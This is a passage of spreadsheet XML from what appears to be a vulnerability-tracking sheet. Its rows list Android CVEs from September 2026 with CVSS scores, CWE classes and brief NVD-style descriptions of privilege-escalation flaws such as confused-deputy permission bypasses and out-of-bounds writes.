      <c r="P421" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q421" s="5" t="inlineStr"/>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S421" s="5" t="inlineStr">
        <is>
          <t>In onCreate of SlicePermissionActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28614</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28616</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F422" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr"/>
      <c r="K422" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L422" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q422" s="5" t="inlineStr"/>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S422" s="5" t="inlineStr">
        <is>
          <t>In Setup Wizard, there is a possible way to force connection to a malicious network due to confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28616</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28620</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr"/>
      <c r="K423" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q423" s="5" t="inlineStr"/>
      <c r="R423" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S423" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible unauthorized URI access due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28620</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28624</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr"/>
      <c r="K424" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L424" s="5" t="inlineStr"/>
      <c r="M424" s="5" t="inlineStr"/>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q424" s="5" t="inlineStr"/>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S424" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible read/write access to files without the proper permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28624</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28631</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr"/>
      <c r="K425" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L425" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q425" s="5" t="inlineStr"/>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S425" s="5" t="inlineStr">
        <is>
          <t>In buildMiniResolver of IntentForwarderActivity.java, there is a possible consent bypass due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28631</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28634</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr"/>
      <c r="K426" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L426" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q426" s="5" t="inlineStr"/>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S426" s="5" t="inlineStr">
        <is>
          <t>In handleUssdRequest of PhoneInterfaceManager.java, there is a possible way to send a USSD request without permission due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28634</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28636</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr"/>
      <c r="K427" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L427" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q427" s="5" t="inlineStr"/>
      <c r="R427" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S427" s="5" t="inlineStr">
        <is>
          <t>In setupLayout of PickActivity.java, there is a possible bypass of the "Install unknown apps" security restriction due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28636</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28639</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr"/>
      <c r="K428" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L428" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q428" s="5" t="inlineStr"/>
      <c r="R428" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S428" s="5" t="inlineStr">
        <is>
          <t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28639</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28642</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr"/>
      <c r="K429" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q429" s="5" t="inlineStr"/>
      <c r="R429" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S429" s="5" t="inlineStr">
        <is>
          <t>In executeRequest of ActivityStarter.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28642</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28644</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr"/>
      <c r="K430" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q430" s="5" t="inlineStr"/>
      <c r="R430" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S430" s="5" t="inlineStr">
        <is>
          <t>In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28644</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28650</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr"/>
      <c r="K431" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q431" s="5" t="inlineStr"/>
      <c r="R431" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S431" s="5" t="inlineStr">
        <is>
          <t>In setHiddenWhileSuspended of WindowState.java, there is a possible overlay bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28650</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28653</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q432" s="5" t="inlineStr"/>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>CWE-1190, CWE-787</t>
        </is>
      </c>
      <c r="S432" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28653</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28655</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr"/>
      <c r="K433" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q433" s="5" t="inlineStr"/>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S433" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of RemoteViews.java, there is a possible background activity launch bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28655</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28657</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr"/>
      <c r="K434" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q434" s="5" t="inlineStr"/>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S434" s="5" t="inlineStr">
        <is>
          <t>In onActivityResult of AppWidgetConfigActivityProxy.java, there is a possible unauthorized URI permission grant due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28657</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28658</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr"/>
      <c r="K435" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q435" s="5" t="inlineStr"/>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S435" s="5" t="inlineStr">
        <is>
          <t>In findMetaAuthUid of AccountsDb.java, there is a possible frp bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28658</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28659</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr"/>
      <c r="K436" s="5" t="inlineStr">
        <is>
          <t>google:android_xr</t>
        </is>
      </c>
      <c r="L436" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q436" s="5" t="inlineStr"/>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S436" s="5" t="inlineStr">
        <is>
          <t>In MicroXR Blobstore, there is a possible way to access other app's files due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28659</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28663</t>
        </is>
      </c>
      <c r="D437" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F437" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr"/>
      <c r="K437" s="5" t="inlineStr"/>
      <c r="L437" s="5" t="inlineStr"/>
      <c r="M437" s="5" t="inlineStr"/>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q437" s="5" t="inlineStr"/>
      <c r="R437" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S437" s="5" t="inlineStr">
        <is>
          <t>In buildIntentSenderForUser of LauncherAppsService.java, there is a possible way to launch an activity from the background due to BAL Bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
